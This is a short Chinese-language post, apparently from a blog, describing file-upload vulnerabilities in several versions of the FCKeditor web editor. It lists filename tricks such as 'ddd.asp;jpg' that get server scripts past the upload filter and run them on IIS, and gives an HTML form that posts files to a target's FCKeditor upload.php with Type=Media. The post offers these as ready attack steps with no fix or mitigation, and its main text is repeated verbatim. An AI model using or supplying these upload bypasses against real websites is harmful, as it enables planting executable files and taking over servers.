fckeditor各版本上传漏洞[紧急]
2.65ASP
在不做修改源代码的时候,可以依次试着上传:ddd.asp.asp,ddd.asp;asp,ddd.asp;1.jpg,ddd.asp;jpg,ddd.php.jpg,ddd.php;d.jpg,ddd.php;jpg,看到了吧,ddd.asp;jpg在这个版本中是可以上传的,而且在IIS也能运行,恐怖呀。ddd.php;jpg可以上传,但在fastcgi下出错,在apache下以文本运行。
2.4X
upload/asp/config.asp这个文件写漏了一个Media。可以构造上传。
<form id=”frmUpload” enctype=”multipart/form-data”
action=”http://www.site.com/FCKeditor/editor/filemanager/upload/p
hp/upload.php?Type=Media” method=”post”>
Upload a new file:<br>
<input type=”file” name=”NewFile” size=”50″><br>
<input id=”btnUpload” type=”submit” value=”Upload”>
</form>
在不做修改源代码的时候,可以依次试着上传:ddd.asp.asp,ddd.asp;asp,ddd.asp;1.jpg,ddd.asp;jpg,ddd.php.jpg,ddd.php;d.jpg,ddd.php;jpg,看到了吧,ddd.asp;jpg在这个版本中是可以上传的,而且在IIS也能运行,恐怖呀。ddd.php;jpg可以上传,但在fastcgi下出错,在apache下以文本运行。
2.4X
upload/asp/config.asp这个文件写漏了一个Media。可以构造上传。
<form id=”frmUpload” enctype=”multipart/form-data”
action=”http://www.site.com/FCKeditor/editor/filemanager/upload/p
hp/upload.php?Type=Media” method=”post”>
Upload a new file:<br>
<input type=”file” name=”NewFile” size=”50″><br>
<input id=”btnUpload” type=”submit” value=”Upload”>
</form>
- 没有相关文章
- 没有评论
